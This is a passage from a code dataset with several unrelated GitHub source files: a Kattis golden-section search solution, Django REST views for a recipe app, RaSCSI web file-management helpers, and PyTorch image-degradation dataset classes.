api.run(port=8000)\n","repo_name":"Epimetheus84/DRS_manager","sub_path":"app/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"22165708458","text":"from math import *\r\n\r\ndef golden(a0, b0, f, tol):\r\n gr = (5**0.5-1)/2\r\n t, a, b = 0, a0, b0\r\n while b - a > tol:\r\n λ, μ = gr*a + (1-gr)*b, (1-gr)*a + gr*b\r\n if f(μ) > f(λ): b = μ\r\n else: a = λ\r\n t += 1\r\n return (a+b)/2\r\n\r\ndef time(c):\r\n return n*(log2(n))**(c*sqrt(2))/(p*1e9) + s*(1+1/c)/v\r\n\r\nn, p, s, v = map(float, input().split())\r\nopt_c = golden(0.1, 100, time, 1e-9)\r\nprint(time(opt_c), opt_c)","repo_name":"RussellDash332/kattis","sub_path":"src/Euclidean TSP/euclideantsp.py","file_name":"euclideantsp.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"2389901834","text":"from django.db.models import Sum\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom djoser.views import UserViewSet\nfrom recipes.models import (Favorite, Ingredient, Recipe, RecipeIngredient,\n ShoppingСart, Tag)\nfrom rest_framework import status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework.response import Response\nfrom users.models import Subscription, User\n\nfrom .filters import IngredientFilter, RecipeFilter\nfrom .pagination import LimitPagination\nfrom .permissions import IsAdminOrOwnerOrReadOnly, IsAdminOrReadOnly\nfrom .serializers import (CreateRecipeSerializer, CustomUserCreateSerializer,\n CustomUserSerializer, IngredientSerializer,\n RecipeSerializer, SubscriptionCreateSerializer,\n SubscriptionSerializer, TagSerializer)\n\nFILENAME = 'shopping_cart.txt'\n\n\nclass RecipeViewSet(viewsets.ModelViewSet):\n \"\"\"Отображение и создание рецептов.\n Добавление в избранное, в список покупок.\n \"\"\"\n queryset = Recipe.objects.all()\n pagination_class = LimitPagination\n filter_backends = (DjangoFilterBackend,)\n filterset_class = RecipeFilter\n\n def get_permissions(self):\n \"\"\"Определение права доступа для запросов.\"\"\"\n if self.action in (\n 'create', 'favorite', 'shopping_cart', 'download_shopping_cart'\n ):\n self.permission_classes = (IsAuthenticated, )\n elif self.action in ('partial_update', 'destroy'):\n self.permission_classes = (IsAdminOrOwnerOrReadOnly, )\n elif self.action in ('list', 'retrieve'):\n self.permission_classes = (AllowAny, )\n return super().get_permissions()\n\n def get_serializer_class(self):\n \"\"\"Определение класса сериалайзера.\"\"\"\n if self.action in ('create', 'partial_update'):\n return CreateRecipeSerializer\n return RecipeSerializer\n\n @action(detail=True, methods=[\"POST\", \"DELETE\"])\n def favorite(self, request, pk):\n \"\"\"Добавление рецепта в избранное/удаление из избранного\"\"\"\n return self.add_delete_recipe(\n model=Favorite,\n pk=pk,\n method=request.method,\n )\n\n @action(detail=True, methods=[\"POST\", \"DELETE\"])\n def shopping_cart(self, request, pk):\n \"\"\"Добавление/удаление рецепта в корзину/из корзины\"\"\"\n return self.add_delete_recipe(\n model=ShoppingСart,\n pk=pk,\n method=request.method,\n )\n\n def add_delete_recipe(self, model, pk, method):\n \"\"\"Вспомогательная 
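# Quick sanity check of the golden-section minimizer defined above, restated
# without the unused iteration counter: on a convex function with a known
# minimum, the shrinking bracket should converge to it.
def golden(a, b, f, tol):
    gr = (5 ** 0.5 - 1) / 2
    while b - a > tol:
        lam, mu = gr * a + (1 - gr) * b, (1 - gr) * a + gr * b
        if f(mu) > f(lam):
            b = mu   # minimum lies left of the right probe
        else:
            a = lam  # minimum lies right of the left probe
    return (a + b) / 2

assert abs(golden(0.0, 5.0, lambda x: (x - 2) ** 2, 1e-9) - 2.0) < 1e-6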
функция для добавления/удаления\n рецепта в избранное/ корзину.\"\"\"\n user = self.request.user\n recipe = get_object_or_404(Recipe, pk=pk)\n if method == \"POST\":\n obj = model.objects.get_or_create(user=user, recipe=recipe)\n if obj[1] is False:\n raise ValidationError('Рецепт уже был добавлен.')\n return Response(\n {'Рецепт добавлен.'}, status=status.HTTP_201_CREATED\n )\n if method == \"DELETE\":\n obj = model.objects.filter(user=user, recipe=recipe).delete()\n if obj[0] == 0:\n raise ValidationError('Рецепт уже был удален/не был добавлен.')\n return Response(\n {'Рецепт удален.'}, status=status.HTTP_204_NO_CONTENT\n )\n\n @action(detail=False, methods=['GET'],)\n def download_shopping_cart(self, request):\n \"\"\"Формирование списка покупок.\"\"\"\n ingredients_to_buy = (\n RecipeIngredient.objects.filter(\n recipe__shopping_cart__user=request.user).values(\n \"ingredient__name\",\n \"ingredient__measurement_unit\",\n ).annotate(total_amount=Sum(\"amount\"))\n )\n shopping_cart = []\n shopping_cart.append(f\"Список покупок юзера {request.user.username}\\n\")\n for i in ingredients_to_buy:\n name = i[\"ingredient__name\"]\n amount = i[\"total_amount\"]\n measurement_unit = i[\"ingredient__measurement_unit\"]\n shopping_cart.append(f\"{name} ({measurement_unit}) - {amount}\")\n shopping_list = \"\\n\".join(shopping_cart)\n response = HttpResponse(\n shopping_list, content_type=\"text/plain,charset=utf8\"\n )\n response['Content-Disposition'] = f'attachment; filename={FILENAME}'\n return response\n\n\nclass IngredientViewSet(viewsets.ModelViewSet):\n \"\"\"Отображение ингредиентов.\"\"\"\n queryset = Ingredient.objects.all()\n serializer_class = IngredientSerializer\n permission_classes = (IsAdminOrReadOnly, )\n filter_backends = (DjangoFilterBackend,)\n filterset_class = IngredientFilter\n\n\nclass TagViewSet(viewsets.ModelViewSet):\n \"\"\"Отображение тегов.\"\"\"\n queryset = Tag.objects.all()\n serializer_class = TagSerializer\n permission_classes = (IsAdminOrReadOnly,)\n\n\nclass CustomUserViewSet(UserViewSet):\n \"\"\"Отображение пользователей. 
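# Pure-Python sketch of what the Sum("amount") annotation above computes: the
# total amount per (ingredient, unit) pair across every recipe in the cart.
# The ORM performs this fold in SQL; the rows here are synthetic.
from collections import defaultdict

cart_rows = [
    {"name": "flour", "unit": "g", "amount": 200},
    {"name": "flour", "unit": "g", "amount": 300},
    {"name": "milk", "unit": "ml", "amount": 250},
]

totals = defaultdict(int)
for row in cart_rows:
    totals[(row["name"], row["unit"])] += row["amount"]

for (name, unit), amount in totals.items():
    print(f"{name} ({unit}) - {amount}")  # same line format as the shopping list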
Подписка и ее отмена.\"\"\"\n    queryset = User.objects.all()\n    pagination_class = LimitPagination\n\n    def get_serializer_class(self):\n        \"\"\"Определение класса сериалайзера.\"\"\"\n        if self.action in ('create', 'partial_update'):\n            return CustomUserCreateSerializer\n        return CustomUserSerializer\n\n    def get_permissions(self):\n        \"\"\"Определение права доступа для запросов.\"\"\"\n        if self.action in ('subscribe', 'subscriptions'):\n            self.permission_classes = (IsAuthenticated, )\n        elif self.action in ('partial_update', 'destroy'):\n            self.permission_classes = (IsAdminOrOwnerOrReadOnly, )\n        elif self.action in ('create', 'list', 'retrieve'):\n            self.permission_classes = (AllowAny, )\n        return super().get_permissions()\n\n    @action(detail=True, methods=[\"POST\", \"DELETE\"])\n    def subscribe(self, request, id):\n        \"\"\"Создание/удаление подписки на пользователя.\"\"\"\n        data = {'subscriber': request.user.id, 'author': id}\n        serializer = SubscriptionCreateSerializer(\n            data=data, context={'request': request}\n        )\n        if request.method == \"POST\":\n            serializer.is_valid(raise_exception=True)\n            serializer.save(user=request.user)\n            return Response(\n                serializer.data,\n                status=status.HTTP_201_CREATED\n            )\n        if request.method == 'DELETE':\n            subscription = Subscription.objects.filter(\n                subscriber=request.user, author__id=id\n            )\n            obj = subscription.delete()\n            if obj[0] == 0:\n                raise ValidationError('Вы не подписаны на этого пользователя.')\n            return Response(\n                {'Вы отменили подписку на пользователя'},\n                status=status.HTTP_204_NO_CONTENT\n            )\n\n    @action(detail=False, methods=[\"GET\"])\n    def subscriptions(self, request):\n        \"\"\"Просмотр подписок.\"\"\"\n        subscriptions = User.objects.filter(\n            subscribers__subscriber=self.request.user\n        )\n        paginator = LimitPagination()\n        result_page = paginator.paginate_queryset(subscriptions, request)\n        serializer = SubscriptionSerializer(\n            result_page, many=True, context={\"request\": request}\n        )\n        return paginator.get_paginated_response(serializer.data)\n","repo_name":"marinamurina/foodgram-project-react","sub_path":"foodgram/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70835823160","text":"\"\"\"\nModule for methods reading from and writing to the file system\n\"\"\"\n\nimport os\nimport logging\nfrom pathlib import PurePath\nfrom flask import current_app, session\nfrom flask_babel import _\n\nfrom ractl_cmds import (\n    get_server_info,\n    get_reserved_ids,\n    attach_image,\n    detach_all,\n    list_devices,\n    reserve_scsi_ids,\n)\nfrom pi_cmds import run_async\nfrom socket_cmds import send_pb_command\nfrom settings import CFG_DIR, CONFIG_FILE_SUFFIX, PROPERTIES_SUFFIX, RESERVATIONS\nimport rascsi_interface_pb2 as proto\n\n\ndef list_files(file_types, dir_path):\n    \"\"\"\n    Takes a (list) or (tuple) of (str) file_types - e.g. 
('hda', 'hds')\n Returns (list) of (list)s files_list:\n index 0 is (str) file name and index 1 is (int) size in bytes\n \"\"\"\n files_list = []\n for path, dirs, files in os.walk(dir_path):\n # Only list selected file types\n files = [f for f in files if f.lower().endswith(file_types)]\n files_list.extend(\n [\n (\n file,\n os.path.getsize(os.path.join(path, file))\n )\n for file in files\n ]\n )\n return files_list\n\n\ndef list_config_files():\n \"\"\"\n Finds fils with file ending CONFIG_FILE_SUFFIX in CFG_DIR.\n Returns a (list) of (str) files_list\n \"\"\"\n files_list = []\n for root, dirs, files in os.walk(CFG_DIR):\n for file in files:\n if file.endswith(\".\" + CONFIG_FILE_SUFFIX):\n files_list.append(file)\n return files_list\n\n\ndef list_images():\n \"\"\"\n Sends a IMAGE_FILES_INFO command to the server\n Returns a (dict) with (bool) status, (str) msg, and (list) of (dict)s files\n\n \"\"\"\n command = proto.PbCommand()\n command.operation = proto.PbOperation.DEFAULT_IMAGE_FILES_INFO\n command.params[\"token\"] = current_app.config[\"TOKEN\"]\n if \"language\" in session.keys():\n command.params[\"locale\"] = session[\"language\"]\n\n data = send_pb_command(command.SerializeToString())\n result = proto.PbResult()\n result.ParseFromString(data)\n\n # Get a list of all *.properties files in CFG_DIR\n prop_data = list_files(PROPERTIES_SUFFIX, CFG_DIR)\n prop_files = [PurePath(x[0]).stem for x in prop_data]\n\n from zipfile import ZipFile, is_zipfile\n server_info = get_server_info()\n files = []\n for file in result.image_files_info.image_files:\n # Add properties meta data for the image, if applicable\n if file.name in prop_files:\n process = read_drive_properties(f\"{CFG_DIR}/{file.name}.{PROPERTIES_SUFFIX}\")\n prop = process[\"conf\"]\n else:\n prop = False\n if file.name.lower().endswith(\".zip\"):\n zip_path = f\"{server_info['image_dir']}/{file.name}\"\n if is_zipfile(zip_path):\n zipfile = ZipFile(zip_path)\n # Get a list of (str) containing all zipfile members\n zip_members = zipfile.namelist()\n # Strip out directories from the list\n zip_members = [x for x in zip_members if not x.endswith(\"/\")]\n else:\n logging.warning(\"%s is an invalid zip file\", zip_path)\n zip_members = False\n else:\n zip_members = False\n\n size_mb = \"{:,.1f}\".format(file.size / 1024 / 1024)\n dtype = proto.PbDeviceType.Name(file.type)\n files.append({\n \"name\": file.name,\n \"size\": file.size,\n \"size_mb\": size_mb,\n \"detected_type\": dtype,\n \"prop\": prop,\n \"zip_members\": zip_members,\n })\n\n return {\"status\": result.status, \"msg\": result.msg, \"files\": files}\n\n\ndef create_new_image(file_name, file_type, size):\n \"\"\"\n Takes (str) file_name, (str) file_type, and (int) size\n Sends a CREATE_IMAGE command to the server\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n command = proto.PbCommand()\n command.operation = proto.PbOperation.CREATE_IMAGE\n command.params[\"token\"] = current_app.config[\"TOKEN\"]\n if \"language\" in session.keys():\n command.params[\"locale\"] = session[\"language\"]\n\n command.params[\"file\"] = file_name + \".\" + file_type\n command.params[\"size\"] = str(size)\n command.params[\"read_only\"] = \"false\"\n\n data = send_pb_command(command.SerializeToString())\n result = proto.PbResult()\n result.ParseFromString(data)\n return {\"status\": result.status, \"msg\": result.msg}\n\n\ndef delete_image(file_name):\n \"\"\"\n Takes (str) file_name\n Sends a DELETE_IMAGE command to the server\n Returns (dict) with (bool) status and 
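# Standalone sketch of the zip-inspection step in list_images() above:
# validate the archive, list its members, and drop directory entries.
# An in-memory archive stands in for a file on disk.
import io
from zipfile import ZipFile, is_zipfile

buf = io.BytesIO()
with ZipFile(buf, "w") as z:
    z.writestr("disk.hda", b"data")
    z.writestr("docs/", b"")            # a directory entry, filtered out below
    z.writestr("docs/readme.txt", b"hello")

buf.seek(0)
if is_zipfile(buf):
    members = ZipFile(buf).namelist()
    members = [m for m in members if not m.endswith("/")]
    print(members)  # ['disk.hda', 'docs/readme.txt']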
(str) msg\n \"\"\"\n command = proto.PbCommand()\n command.operation = proto.PbOperation.DELETE_IMAGE\n command.params[\"token\"] = current_app.config[\"TOKEN\"]\n if \"language\" in session.keys():\n command.params[\"locale\"] = session[\"language\"]\n\n command.params[\"file\"] = file_name\n\n data = send_pb_command(command.SerializeToString())\n result = proto.PbResult()\n result.ParseFromString(data)\n return {\"status\": result.status, \"msg\": result.msg}\n\n\ndef rename_image(file_name, new_file_name):\n \"\"\"\n Takes (str) file_name, (str) new_file_name\n Sends a RENAME_IMAGE command to the server\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n command = proto.PbCommand()\n command.operation = proto.PbOperation.RENAME_IMAGE\n command.params[\"token\"] = current_app.config[\"TOKEN\"]\n if \"language\" in session.keys():\n command.params[\"locale\"] = session[\"language\"]\n\n command.params[\"from\"] = file_name\n command.params[\"to\"] = new_file_name\n\n data = send_pb_command(command.SerializeToString())\n result = proto.PbResult()\n result.ParseFromString(data)\n return {\"status\": result.status, \"msg\": result.msg}\n\n\ndef delete_file(file_path):\n \"\"\"\n Takes (str) file_path with the full path to the file to delete\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n if os.path.exists(file_path):\n os.remove(file_path)\n return {\n \"status\": True,\n \"msg\": _(u\"File deleted: %(file_path)s\", file_path=file_path),\n }\n return {\n \"status\": False,\n \"msg\": _(u\"File to delete not found: %(file_path)s\", file_path=file_path),\n }\n\n\ndef rename_file(file_path, target_path):\n \"\"\"\n Takes (str) file_path and (str) target_path\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n if os.path.exists(PurePath(target_path).parent):\n os.rename(file_path, target_path)\n return {\n \"status\": True,\n \"msg\": _(u\"File moved to: %(target_path)s\", target_path=target_path),\n }\n return {\n \"status\": False,\n \"msg\": _(u\"Unable to move file to: %(target_path)s\", target_path=target_path),\n }\n\n\ndef unzip_file(file_name, member=False, members=False):\n \"\"\"\n Takes (str) file_name, optional (str) member, optional (list) of (str) members\n file_name is the name of the zip file to unzip\n member is the full path to the particular file in the zip file to unzip\n members contains all of the full paths to each of the zip archive members\n Returns (dict) with (boolean) status and (list of str) msg\n \"\"\"\n from asyncio import run\n server_info = get_server_info()\n prop_flag = False\n\n if not member:\n unzip_proc = run(run_async(\n f\"unzip -d {server_info['image_dir']} -n -j \"\n f\"{server_info['image_dir']}/{file_name}\"\n ))\n if members:\n for path in members:\n if path.endswith(PROPERTIES_SUFFIX):\n name = PurePath(path).name\n rename_file(f\"{server_info['image_dir']}/{name}\", f\"{CFG_DIR}/{name}\")\n prop_flag = True\n else:\n from re import escape\n member = escape(member)\n unzip_proc = run(run_async(\n f\"unzip -d {server_info['image_dir']} -n -j \"\n f\"{server_info['image_dir']}/{file_name} {member}\"\n ))\n # Attempt to unzip a properties file in the same archive dir\n unzip_prop = run(run_async(\n f\"unzip -d {CFG_DIR} -n -j \"\n f\"{server_info['image_dir']}/{file_name} {member}.{PROPERTIES_SUFFIX}\"\n ))\n if unzip_prop[\"returncode\"] == 0:\n prop_flag = True\n if unzip_proc[\"returncode\"] != 0:\n logging.warning(\"Unzipping failed: %s\", unzip_proc[\"stderr\"])\n return {\"status\": False, \"msg\": 
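# Stdlib sketch of the guarded delete/rename pattern used by delete_file()
# and rename_file() above, minus the Flask/Babel response envelopes; a
# temporary directory keeps the demonstration self-contained.
import os
from pathlib import PurePath
import tempfile

def delete_file(path):
    if os.path.exists(path):
        os.remove(path)
        return True
    return False

def rename_file(src, dst):
    # Only move when the destination directory already exists.
    if os.path.exists(PurePath(dst).parent):
        os.rename(src, dst)
        return True
    return False

with tempfile.TemporaryDirectory() as d:
    p = os.path.join(d, "a.txt")
    open(p, "w").close()
    print(rename_file(p, os.path.join(d, "b.txt")), delete_file(os.path.join(d, "b.txt")))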
unzip_proc[\"stderr\"]}\n\n from re import findall\n unzipped = findall(\n \"(?:inflating|extracting):(.+)\\n\",\n unzip_proc[\"stdout\"]\n )\n return {\"status\": True, \"msg\": unzipped, \"prop_flag\": prop_flag}\n\n\ndef download_file_to_iso(url, *iso_args):\n \"\"\"\n Takes (str) url and one or more (str) *iso_args\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n from time import time\n from subprocess import run, CalledProcessError\n import asyncio\n\n server_info = get_server_info()\n\n file_name = PurePath(url).name\n tmp_ts = int(time())\n tmp_dir = \"/tmp/\" + str(tmp_ts) + \"/\"\n os.mkdir(tmp_dir)\n tmp_full_path = tmp_dir + file_name\n iso_filename = f\"{server_info['image_dir']}/{file_name}.iso\"\n\n req_proc = download_to_dir(url, tmp_dir)\n\n if not req_proc[\"status\"]:\n return {\"status\": False, \"msg\": req_proc[\"msg\"]}\n\n from zipfile import is_zipfile, ZipFile\n if is_zipfile(tmp_full_path):\n if \"XtraStuf.mac\" in str(ZipFile(tmp_full_path).namelist()):\n logging.info(\"MacZip file format detected. Will not unzip to retain resource fork.\")\n else:\n logging.info(\n \"%s is a zipfile! Will attempt to unzip and store the resulting files.\",\n tmp_full_path,\n )\n unzip_proc = asyncio.run(run_async(\n f\"unzip -d {tmp_dir} -n {tmp_full_path}\"\n ))\n if not unzip_proc[\"returncode\"]:\n logging.info(\n \"%s was successfully unzipped. Deleting the zipfile.\",\n tmp_full_path,\n )\n delete_file(tmp_full_path)\n\n try:\n run(\n [\n \"genisoimage\",\n *iso_args,\n \"-o\",\n iso_filename,\n tmp_dir,\n ],\n capture_output=True,\n check=True,\n )\n except CalledProcessError as error:\n logging.warning(\"Executed shell command: %s\", \" \".join(error.cmd))\n logging.warning(\"Got error: %s\", error.stderr.decode(\"utf-8\"))\n return {\"status\": False, \"msg\": error.stderr.decode(\"utf-8\")}\n\n return {\n \"status\": True,\n \"msg\": _(\n u\"Created CD-ROM ISO image with arguments \\\"%(value)s\\\"\",\n value=\" \".join(iso_args),\n ),\n \"file_name\": iso_filename,\n }\n\n\ndef download_to_dir(url, save_dir):\n \"\"\"\n Takes (str) url, (str) save_dir\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n import requests\n file_name = PurePath(url).name\n logging.info(\"Making a request to download %s\", url)\n\n try:\n with requests.get(url, stream=True, headers={\"User-Agent\": \"Mozilla/5.0\"}) as req:\n req.raise_for_status()\n with open(f\"{save_dir}/{file_name}\", \"wb\") as download:\n for chunk in req.iter_content(chunk_size=8192):\n download.write(chunk)\n except requests.exceptions.RequestException as error:\n logging.warning(\"Request failed: %s\", str(error))\n return {\"status\": False, \"msg\": str(error)}\n\n logging.info(\"Response encoding: %s\", req.encoding)\n logging.info(\"Response content-type: %s\", req.headers[\"content-type\"])\n logging.info(\"Response status code: %s\", req.status_code)\n\n return {\n \"status\": True,\n \"msg\": _(\n u\"%(file_name)s downloaded to %(save_dir)s\",\n file_name=file_name,\n save_dir=save_dir,\n ),\n }\n\n\ndef write_config(file_name):\n \"\"\"\n Takes (str) file_name\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n from json import dump\n file_name = f\"{CFG_DIR}/{file_name}\"\n try:\n with open(file_name, \"w\") as json_file:\n version = get_server_info()[\"version\"]\n devices = list_devices()[\"device_list\"]\n for device in devices:\n # Remove keys that we don't want to store in the file\n del device[\"status\"]\n del device[\"file\"]\n # It's cleaner not to store an empty 
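# Sketch of the chunked-download pattern in download_to_dir() above: stream
# the response and write fixed-size chunks instead of buffering the whole
# file in memory. The URL passed in would be caller-supplied.
import requests

def download(url, dest):
    with requests.get(url, stream=True, headers={"User-Agent": "Mozilla/5.0"}) as req:
        req.raise_for_status()  # surface HTTP errors before writing anything
        with open(dest, "wb") as out:
            for chunk in req.iter_content(chunk_size=8192):
                out.write(chunk)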
parameter for every device without media\n if device[\"image\"] == \"\":\n device[\"image\"] = None\n # RaSCSI product names will be generated on the fly by RaSCSI\n if device[\"vendor\"] == \"RaSCSI\":\n device[\"vendor\"] = device[\"product\"] = device[\"revision\"] = None\n # A block size of 0 is how RaSCSI indicates N/A for block size\n if device[\"block_size\"] == 0:\n device[\"block_size\"] = None\n # Convert to a data type that can be serialized\n device[\"params\"] = dict(device[\"params\"])\n reserved_ids_and_memos = []\n reserved_ids = get_reserved_ids()[\"ids\"]\n for scsi_id in reserved_ids:\n reserved_ids_and_memos.append({\"id\": scsi_id, \"memo\": RESERVATIONS[int(scsi_id)]})\n dump(\n {\"version\": version, \"devices\": devices, \"reserved_ids\": reserved_ids_and_memos},\n json_file,\n indent=4\n )\n return {\n \"status\": True,\n \"msg\": _(u\"Saved configuration file to %(file_name)s\", file_name=file_name),\n }\n except (IOError, ValueError, EOFError, TypeError) as error:\n logging.error(str(error))\n delete_file(file_name)\n return {\"status\": False, \"msg\": str(error)}\n except:\n logging.error(\"Could not write to file: %s\", file_name)\n delete_file(file_name)\n return {\n \"status\": False,\n \"msg\": _(u\"Could not write to file: %(file_name)s\", file_name=file_name),\n }\n\n\ndef read_config(file_name):\n \"\"\"\n Takes (str) file_name\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n from json import load\n file_name = f\"{CFG_DIR}/{file_name}\"\n try:\n with open(file_name) as json_file:\n config = load(json_file)\n # If the config file format changes again in the future,\n # introduce more sophisticated format detection logic here.\n if isinstance(config, dict):\n detach_all()\n ids_to_reserve = []\n for item in config[\"reserved_ids\"]:\n ids_to_reserve.append(item[\"id\"])\n RESERVATIONS[int(item[\"id\"])] = item[\"memo\"]\n reserve_scsi_ids(ids_to_reserve)\n for row in config[\"devices\"]:\n kwargs = {\n \"device_type\": row[\"device_type\"],\n \"image\": row[\"image\"],\n \"unit\": int(row[\"unit\"]),\n \"vendor\": row[\"vendor\"],\n \"product\": row[\"product\"],\n \"revision\": row[\"revision\"],\n \"block_size\": row[\"block_size\"],\n }\n params = dict(row[\"params\"])\n for param in params.keys():\n kwargs[param] = params[param]\n attach_image(row[\"id\"], **kwargs)\n # The config file format in RaSCSI 21.10 is using a list data type at the top level.\n # If future config file formats return to the list data type,\n # introduce more sophisticated format detection logic here.\n elif isinstance(config, list):\n detach_all()\n for row in config:\n kwargs = {\n \"device_type\": row[\"device_type\"],\n \"image\": row[\"image\"],\n # \"un\" for backwards compatibility\n \"unit\": int(row[\"un\"]),\n \"vendor\": row[\"vendor\"],\n \"product\": row[\"product\"],\n \"revision\": row[\"revision\"],\n \"block_size\": row[\"block_size\"],\n }\n params = dict(row[\"params\"])\n for param in params.keys():\n kwargs[param] = params[param]\n attach_image(row[\"id\"], **kwargs)\n else:\n return {\"status\": False, \"msg\": _(u\"Invalid configuration file format\")}\n return {\n \"status\": True,\n \"msg\": _(u\"Loaded configurations from: %(file_name)s\", file_name=file_name),\n }\n except (IOError, ValueError, EOFError, TypeError) as error:\n logging.error(str(error))\n return {\"status\": False, \"msg\": str(error)}\n except:\n logging.error(\"Could not read file: %s\", file_name)\n return {\n \"status\": False,\n \"msg\": _(u\"Could not read 
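# Minimal round-trip sketch of the config persistence in write_config()/
# read_config() above: normalize device rows, dump to JSON, reload, and
# branch on the top-level type the way the format detection does.
import json

devices = [{"id": 0, "device_type": "SCHD", "image": "", "block_size": 0}]
for device in devices:
    # Empty/zero markers are stored as null, matching the cleanup above.
    if device["image"] == "":
        device["image"] = None
    if device["block_size"] == 0:
        device["block_size"] = None

blob = json.dumps({"version": "x.y", "devices": devices}, indent=4)
config = json.loads(blob)
if isinstance(config, dict):    # current format: dict with a "devices" key
    print(config["devices"])
elif isinstance(config, list):  # legacy format: bare list of devices
    print(config)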
configuration file: %(file_name)s\", file_name=file_name),\n }\n\n\ndef write_drive_properties(file_name, conf):\n \"\"\"\n Writes a drive property configuration file to the config dir.\n Takes file name base (str) and (list of dicts) conf as arguments\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n from json import dump\n file_path = f\"{CFG_DIR}/{file_name}\"\n try:\n with open(file_path, \"w\") as json_file:\n dump(conf, json_file, indent=4)\n return {\n \"status\": True,\n \"msg\": _(u\"Created properties file: %(file_path)s\", file_path=file_path),\n }\n except (IOError, ValueError, EOFError, TypeError) as error:\n logging.error(str(error))\n delete_file(file_path)\n return {\"status\": False, \"msg\": str(error)}\n except:\n logging.error(\"Could not write to file: %s\", file_path)\n delete_file(file_path)\n return {\n \"status\": False,\n \"msg\": _(u\"Could not write to properties file: %(file_path)s\", file_path=file_path),\n }\n\n\ndef read_drive_properties(file_path):\n \"\"\"\n Reads drive properties from json formatted file.\n Takes (str) file_path as argument.\n Returns (dict) with (bool) status, (str) msg, (dict) conf\n \"\"\"\n from json import load\n try:\n with open(file_path) as json_file:\n conf = load(json_file)\n return {\n \"status\": True,\n \"msg\": _(u\"Read properties from file: %(file_path)s\", file_path=file_path),\n \"conf\": conf,\n }\n except (IOError, ValueError, EOFError, TypeError) as error:\n logging.error(str(error))\n return {\"status\": False, \"msg\": str(error)}\n except:\n logging.error(\"Could not read file: %s\", file_path)\n return {\n \"status\": False,\n \"msg\": _(u\"Could not read properties from file: %(file_path)s\", file_path=file_path),\n }\n","repo_name":"akuker/RASCSI-micromod","sub_path":"src/web/file_cmds.py","file_name":"file_cmds.py","file_ext":"py","file_size_in_byte":19287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26398819038","text":"# This file contains the dataset classes used for training and testing.\n\nfrom pytorch_lightning import LightningDataModule\nfrom torch.utils.data import DataLoader, Dataset\nimport torch\nfrom torchvision import transforms, io\nimport torchvision.transforms.functional as TF\nfrom pathlib import Path\nimport numpy as np\nfrom utils import rescale_colors\n\n\ndef randomJPEGcompression(image):\n qf = np.random.randint(40, 100)\n res = io.decode_jpeg(io.encode_jpeg(image.type(torch.uint8), qf)).type_as(image)\n return res\n\n\ndef randomGaussianBlur(image):\n sigma = np.random.uniform(1.0, 5.0)\n k = np.random.choice([3, 5, 7])\n return torch.clamp(TF.gaussian_blur(image, (k, k), sigma), 0.0, 255.0)\n\n\ndef randomGaussianNoise(image):\n sigma = np.random.uniform(5.0, 50.0)\n return torch.clamp(image + torch.randn_like(image) * sigma, 0.0, 255.0)\n\n\ndef randomColorJitter(image):\n # A bit strange, but it is used in the paper\n delta = np.random.uniform(-20.0, 20.0)\n return torch.clamp(image + delta, 0.0, 255.0)\n\n\ndata_transform = transforms.Compose(\n [\n transforms.RandomCrop(256, pad_if_needed=True),\n transforms.RandomHorizontalFlip(0.5),\n ]\n)\n\nrandom_degradation = transforms.RandomOrder(\n [\n transforms.RandomApply([transforms.Lambda(randomGaussianNoise)], p=0.7),\n transforms.RandomApply([transforms.Lambda(randomGaussianBlur)], p=0.7),\n transforms.RandomApply([transforms.Lambda(randomJPEGcompression)], p=0.7),\n transforms.RandomApply([transforms.Lambda(randomColorJitter)], p=0.7),\n ]\n)\n\n\n# Dataset 
class that load 256x256 center cropped images from a directory (For VAE2 training and visualization)\nclass VanillaDataset(Dataset):\n def __init__(self, data_dir: str, split: str, split_ratio=0.75):\n # load images\n self.data_dir = Path(data_dir)\n imgs = sorted(\n [\n str(f)\n for f in self.data_dir.iterdir()\n if f.suffix == \".png\" or f.suffix == \".jpg\"\n ]\n )\n\n self.imgs = (\n imgs[: int(len(imgs) * split_ratio)]\n if split == \"train\"\n else imgs[int(len(imgs) * split_ratio) :]\n )\n\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, idx):\n img = io.read_image(self.imgs[idx]).float()\n img = data_transform(img)\n\n return rescale_colors(img), 0.0\n\n\n# Dataset class that load 256x256 center cropped images from a directory (For Mapping training) and add random degradation.\n# The dataset is composed of pairs of clean and noisy images.\nclass MappingDataset(Dataset):\n def __init__(self, data_dir: str, split: str, split_ratio=0.75):\n # Load images\n self.data_dir = Path(data_dir + \"/non_noisy\")\n imgs = sorted(\n [\n str(f)\n for f in self.data_dir.iterdir()\n if f.suffix == \".png\" or f.suffix == \".jpg\"\n ]\n )\n\n self.imgs = (\n imgs[: int(len(imgs) * split_ratio)]\n if split == \"train\"\n else imgs[int(len(imgs) * split_ratio) :]\n )\n\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, idx):\n img = io.read_image(self.imgs[idx]).float()\n img = data_transform(img)\n noisy_img = random_degradation(img)\n\n return torch.stack([rescale_colors(img), rescale_colors(noisy_img)]), 0.0\n\n\n# Dataset class that load 256x256 center cropped images from a noisy image directory and a clean image directory (For VAE1 training).\n# The clean images are degraded with noise.\n# The dataset is composed of pairs of noisy images and a label indicating if the noise of the image is synthetic or real.\nclass PhaseADataset(Dataset):\n def __init__(self, data_dir: str, split: str, split_ratio=0.75):\n\n # Load noisy images\n real_data_dir = Path(data_dir + \"/noisy\")\n real_imgs = sorted(\n [\n str(f)\n for f in real_data_dir.iterdir()\n if f.suffix == 